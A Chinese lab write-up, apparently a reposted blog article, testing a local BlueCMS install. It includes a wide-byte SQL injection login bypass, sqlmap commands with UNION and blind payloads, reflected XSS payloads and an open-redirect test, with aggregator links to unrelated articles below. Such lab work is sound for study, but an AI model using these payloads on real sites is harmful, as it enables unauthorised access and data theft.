渗透测试模拟实战(二)-BlueCMS平台

news2024/12/25 1:03:05

渗透测试

 渗透测试是维护网络安全的重要组成部分,可以帮助组织识别并修复潜在的安全漏洞,减少被恶意攻击的风险。然而,进行渗透测试时必须遵守法律和道德规范,确保所有活动都在授权范围内进行。

环境部署:

study2016、BlueCMS平台  安全工具    

 

安装BlueCMS平台:

http://10.0.0.101:90/bluecms/install/

安装完成:


工具漏洞扫描
1、快速使用fscan、appscan、nessus、nmap、awvs、goby、7kb、破壳、御剑等

web漏洞扫描工具:appscan、awvs(Acunetix)、Netsparker.

系统漏洞扫描工具:nessus

信息收集:

域名:fofa、谷歌、百度、零零信安等搜索引擎、DNS历史记录、DNS备案号查询、https证书

敏感信息:谷歌搜索,社工库检索、威胁情报、天眼查、零零信安、7kb、破壳、dirsearch

IP地址:有CDN通过fofa标签找到真实ip、文件的hash值、网站证书、dns历史记录

网站指纹:wappalyzer插件、御剑web指纹识别、在线平台

端口:nmap、masscan、fscan、goby

目录扫描:7kb、破壳、御剑

旁站信息:fofa、masscan、k8、goby、fscan

http://10.0.0.101:90/bluecms/

用御剑扫描后台目录;对扫描出来的网站目录进行访问检测:

 管理员账户:

admin  admin

手工探测漏洞


bp与xary联合使用:


0、bp设置顶级代理;xary反向监听。

0-1、打开bp设置顶级代理:

0-2、xary配置config.yaml文件填写网站地址及端口; 

# 被动代理配置

hostname_allowed: [10.0.0.101]

port_allowed: [90]

 0-3、xary输入命令运行:

xray.exe webscan --listen 127.0.0.1:7777 --html-output lan202469.html


这个命令将启动Xray进行Web扫描,监听本地主机的7777端口,并将扫描结果以HTML格式保存到一个名为lan202469.html的文件中 

1-1、管理员登陆页面探测

1-1.1管理员登陆页面存在SQL注入漏洞(与数据库交互的地方测注入漏洞)

步骤:

输入错误账户bp抓包登录:(如:用户test  密码zzzzzz)

 管理员用户名处插入SQL注入宽字节payload:(%df' or 1=1 #)

POST http://10.0.0.101:90/bluecms/admin/login.php HTTP/1.1
Host: 10.0.0.101:90
Content-Length: 65
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.0.0.101:90
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.0.0.101:90/bluecms/admin/login.php?act=login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: 4unT_2132_lastvisit=1715954790; 4unT_2132_ulastactivity=bbe7dShKgYKRaBrRbwkvKSunwF6na%2B4Ow0kVNoUVHsSdR0D2Ii4f; 4unT_2132_visitedfid=2; 4unT_2132_smile=1D1; sitekeyword=%3Ca+href%3D%27http%3A%2F%2Fx%2E5vshop%2Ecom%27%3E5vShop%C8%FD%BA%CF%D2%BB%B5%E7%C9%CC%CF%B5%CD%B3%C9%CF%CA%D0%21%21%3C%2Fa%3E%26nbsp%3B%26nbsp%3B%3Ca+href%3D%27show%2Easp%3Fpkid%3D4929%27%3E%C3%C9%CC%D8%CB%B9%3C%2Fa%3E%26nbsp%3B%26nbsp%3B%3Ca+href%3D%27productlist%2Easp%3Fkind%3D00030008%27%3E%D6%D0%B5%CD%B6%CB%C3%C0%BE%C6%3C%2Fa%3E%26nbsp%3B%26nbsp%3B%26nbsp%3B; PHPSESSID=dde9a840faadf829efabb435f693eb4c
Connection: close

admin_name=test%df' or 1=1 #&admin_pwd=zzzzzz&submit=%B5%C7%C2%BC&act=do_login

成功登录 


1-2、注册新用户页面探测

1-2.1注册新用户用户名存在不安全提示,密码明文传输

http://10.0.0.101:90/bluecms/user.php?act=reg


1-2.2插入xss代码:(未探测到)

 


 1-2.3、注册新用户bp抓包批量注册漏洞探测:

抓包设置用户名变量批量注册 :(存在批量注册、验证码可多次使用)


 1-2.4、注册新用户bp抓包注入漏洞探测:

 第二个包用户名密码在cookie里存在风险,尝试slqmap跑一下sql注入漏洞:

 抓包的请求内容:

GET http://10.0.0.101:90/bluecms/user.php HTTP/1.1
Host: 10.0.0.101:90
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.0.0.101:90/bluecms/user.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: detail=1; 4unT_2132_lastvisit=1715954790; 4unT_2132_ulastactivity=bbe7dShKgYKRaBrRbwkvKSunwF6na%2B4Ow0kVNoUVHsSdR0D2Ii4f; 4unT_2132_visitedfid=2; 4unT_2132_smile=1D1; sitekeyword=%3Ca+href%3D%27http%3A%2F%2Fx%2E5vshop%2Ecom%27%3E5vShop%C8%FD%BA%CF%D2%BB%B5%E7%C9%CC%CF%B5%CD%B3%C9%CF%CA%D0%21%21%3C%2Fa%3E%26nbsp%3B%26nbsp%3B%3Ca+href%3D%27show%2Easp%3Fpkid%3D4929%27%3E%C3%C9%CC%D8%CB%B9%3C%2Fa%3E%26nbsp%3B%26nbsp%3B%3Ca+href%3D%27productlist%2Easp%3Fkind%3D00030008%27%3E%D6%D0%B5%CD%B6%CB%C3%C0%BE%C6%3C%2Fa%3E%26nbsp%3B%26nbsp%3B%26nbsp%3B; PHPSESSID=dde9a840faadf829efabb435f693eb4c; BLUE[user_id]=35; BLUE[user_name]=tes3; BLUE[user_pwd]=e50cb9a9b518e275bc06352e414063b9
Connection: close

粘贴到 新建1.txt文件中:

 

 

C:\lan\sqlmap>sqlmap.py -r c:\1.txt --leve 3

Are you sure you want to continue? [y/N] y

you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] n

1-3.、登录页面漏洞探测:

1-3-1、任意跳转漏洞:

登录用户bp抓包from参数为空:

 from参数填写百度链接(需base64编码)

百度链接:bhttp://www.baidu.com

Base64编码:

aHR0cDovL3d3dy5iYWlkdS5jb20=

成功跳转百度:(存在任意链接跳转) 


1-3.2、隐藏表单存在xss漏洞:

 url直接改为from参数插入xss代码:

原登录url地址:

http://10.0.0.101:90/bluecms/user.php?act=login

改为: 

http://10.0.0.101:90/bluecms/user.php?from='"></script><script>alert(1111)</script>


1-4、工具扫描的漏洞探测:

1-4.1、xss漏洞(存在)

访问此页面xary提示存在xss漏洞: 

http://10.0.0.101:90/bluecms/ad_js.php?ad_id=1

 

 url插入xss代码:

http://10.0.0.101:90/bluecms/ad_js.php?ad_id=1'"><ScRiPt>alert(1)</ScRiPt>

访问链接:(存在xss) 

1-4.2、sql注入漏洞:(存在)

 访问此页面xary提示存在SQL注入漏洞: 

http://10.0.0.101:90/bluecms/ad_js.php?ad_id=1

验证方式一:url输入注入判断语句:

http://10.0.0.101:90/bluecms/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,7

http://10.0.0.101:90/bluecms/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,7,8

验证方式二: sqlmap跑注入:

bp抓包,复制请求包到新建1.txt文件 

步骤:

第一步:
C:\lan\sqlmap>sqlmap.py -r c:\1.txt --leve 3

第二步:
Are you sure you want to continue? [y/N] y

第三步:
GET parameter 'ad_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n

结果:
---
Place: GET
Parameter: ad_id
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: ad_id=1 RLIKE IF(4693=4693,1,0x28)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: ad_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a6561723a,0x49576c565875676a456f,0x3a6764653a),NULL#

结果:(存在注入漏洞) 


 

1-4.3、扫描器扫描的漏洞:(物理路径泄露)

链接地址:

http://10.0.0.101:90/bluecms/include/FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php

方式一:尝试右击查看源代码:

 显示物理路径:

 

方式二: bp抓包,尝试重发器重新发送响应包能看到目录信息:(物理路径泄露)


1-4.4、xxs漏洞:(存在)

 链接地址:

http://10.0.0.101:90/bluecms/templates/default/css/jquery.js
JavaScript版本小于1.7存在xss漏洞:

 


声明:

  • 此文章只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试留言私信,如有侵权请联系小编处理。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1810045.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Java:集合框架

1.Collection接口 collection接口是Java最基本的集合接口&#xff0c;它定义了一组允许重复的对象。它虽然不能直接创建实例&#xff0c;但是它派生了两个字接口List和Set&#xff0c;可以使用子接口的实现类创建实例。Collection 接口是抽取List接口和Set接口共同的存储特点和…

面试官:Spring如何解析配置类

你好&#xff0c;我是柳岸花开。 大家好&#xff0c;今天我们来深入探讨一下Spring框架中的配置类解析与扫描过程的源码。Spring作为Java开发中最为广泛使用的框架之一&#xff0c;其核心机制一直是开发者关注的焦点。本文将带领大家从源码角度&#xff0c;详细剖析Spring配置类…

构建高效的数据存储系统:Python dbm 模块的应用与实践

&#x1f340; 前言 博客地址&#xff1a; CSDN&#xff1a;https://blog.csdn.net/powerbiubiu &#x1f44b; 简介 dbm&#xff08;Database Manager&#xff09;是Python中的一个模块&#xff0c;用于创建和管理简单的键值对数据库。它提供了一种简单而有效的方式来存储和…

HTML静态网页成品作业(HTML+CSS)—— 环保主题介绍网页(5个页面)

&#x1f389;不定期分享源码&#xff0c;关注不丢失哦 文章目录 一、作品介绍二、作品演示三、代码目录四、网站代码HTML部分代码 五、源码获取 一、作品介绍 &#x1f3f7;️本套采用HTMLCSS&#xff0c;未使用Javacsript代码&#xff0c;共有5个页面。 二、作品演示 三、代…

hadoop未授权访问命令执行漏洞复现-vulfocus

1 介绍 Hadoop YARN&#xff08;Yet Another Resource Negotiator&#xff09;的ResourceManager是集群资源管理的核心组件&#xff0c;负责分配和管理集群资源以及调度作业。如果ResourceManager出现未授权访问漏洞&#xff0c;可能允许未经认证的用户访问或操作集群资源&…

二叉树顺序结构——堆的结构与实现

二叉树顺序结构——堆的结构与实现 一、二叉树的顺序结构二、堆的概念及结构三、堆的实现堆向下调整算法堆的创建建堆时间复杂度堆的插入(堆向上调整算法)堆的删除堆的代码实现(使用VS2022的C语言)初始化、销毁构建、插入、删除返回堆顶元素、判空、返回有效元素个数 四、完整 …

Python深度学习之PyTorch基础教程

⛄前言 PyTorch是一个基于Torch的Python开源机器学习(深度学习)框架&#xff0c;由Facebook的人工智能研究院开发&#xff0c;不仅能够实现强大的GPU加速&#xff0c;还支持动态神经网络&#xff0c;使得研究人员和开发人员能够轻松构建和训练复杂的深度学习模型。与TensorFlo…

贪心算法 -- 组合一组数字获得最大数

贪心算法 – 组合一组数字获得最大数 文章目录 贪心算法 -- 组合一组数字获得最大数题目重现读懂题目贪心场景代码示例 题目重现 题目链接&#xff1a;最大数 - 力扣 给定一组非负整数 nums&#xff0c;重新排列每个数的顺序&#xff08;每个数不可拆分&#xff09;使之组成一…

error 12154 received logging on to the standby报错处理

错误 处理方法 该参数不是主库的servicename &#xff08;低级错误&#xff09; SQL> alter system set log_archive_dest_2 SERVICEstandby ASYNC VALID_FOR(ONLINE_LOGFILES,PRIMARY_ROLE) DB_UNIQUE_NAMEstandby; System altered. 观察主库日志: 备库日志: 该问题会影…

Python集合的基本概念和使用方法

目录 集合&#xff08;Set&#xff09; 基本概念 基本特性 基本操作 集合运算 成员测试 高级操作 集合推导式 总结 集合&#xff08;Set&#xff09; Python集合&#xff08;Set&#xff09;是Python语言中一个非常实用且强大的数据结构&#xff0c;它用于存储多个不…

day27回溯算法part03| 39. 组合总和 40.组合总和II 131.分割回文串

39. 组合总和 题目链接/文章讲解 | 视频讲解 本题是 集合里元素可以用无数次&#xff0c;那么和组合问题的差别 其实仅在于 startIndex上的控制 class Solution { public:int sum;vector<int> path;vector<vector<int>> result;void backtracking(vector<…

爬虫工具yt-dlp

yt-dlp是youtube-dlp的一个fork&#xff0c;youtube-dlp曾经也较为活跃&#xff0c;但后来被众多网站屏蔽&#xff0c;于是大家转而在其基础上开发yt-dlp。yt-dlp的github项目地址为&#xff1a;GitHub - yt-dlp/yt-dlp: A feature-rich command-line audio/video downloaderA …

Java学习【深入探索包装类和泛型】

Java学习【深入探索包装类和泛型】 &#x1f680;包装类获取包装类对象的方式使用valueOf()创建直接赋值 Integer成员方法 &#x1f680;泛型引出泛型泛型类泛型方法泛型接口泛型的继承和通配符泛型的上界 在Java的学习中&#xff0c;包装类和泛型是两个重要的概念&#xff0c;…

分布式事务AP控制方案(上)

分布式事务控制方案 本篇文章给出一种要求高可用性&#xff08;AP思想&#xff09;的分布式事务控制方案 下篇新鲜出炉&#xff1a;点我查看 分布式事务控制方案1、业务背景2、本地消息表的设计3、对消息表的操作4、任务调度5、任务流程控制的抽象类6、课程发布的实现类7、总…

我的创作纪念日--我和CSDN一起走过的1825天

机缘 第一次在CSDN写文章&#xff0c;是自己在记录学习Java8新特性中Lambda表达式的内容过程中收获的学习心得。之前也有记录工作和生活中的心得体会、难点的解决办法、bug的排查处理过程等等。一直都用的有道笔记&#xff0c;没有去和大家区分享的想法&#xff0c;是一起的朋…

《Brave New Words 》2.4 与历史对话

Part II: Giving Voice to the Social Sciences 第二部分&#xff1a;为社会科学发声 Conversing with History 与历史对话 Good history and civics teachers make the past interesting. Great history and civics teachers make the past come alive. When history and civi…

作业07 递推算法2

作业&#xff1a; #include <iostream> using namespace std; int main(){int a[110][110]{0},b[110][110]{0},n;cin>>n;for(int i1;i<n;i){for(int j1;j<i;j){cin>>a[i][j];}}for(int in-1;i>1;i--){for(int j1;j<i;j){a[i][j]a[i][j]max(a[i1]…

离散数学--连通性和矩阵

目录 0.关系的运算和性质 1.通路和回路 2.连通关系 3.割点&#xff08;边&#xff09;和点&#xff08;边&#xff09;割集 4.强&#xff08;弱&#xff09;连通&单向连通 0.关系的运算和性质 &#xff08;1&#xff09;这个运算包括了矩阵的运算&#xff0c;包括这个…

汽车数据应用构想(三)

上期说的&#xff0c;用数据去拟合停车信息的应用&#xff0c;那么类似的POI信息相关的场景其实都可以实现。今天讲讲用户使用频率也很高的加油/充电场景。 实际应用中&#xff0c;在加油场景中用户关心的通常还是价格。无论是导航还是各种加油APP/小程序&#xff0c;都已经很…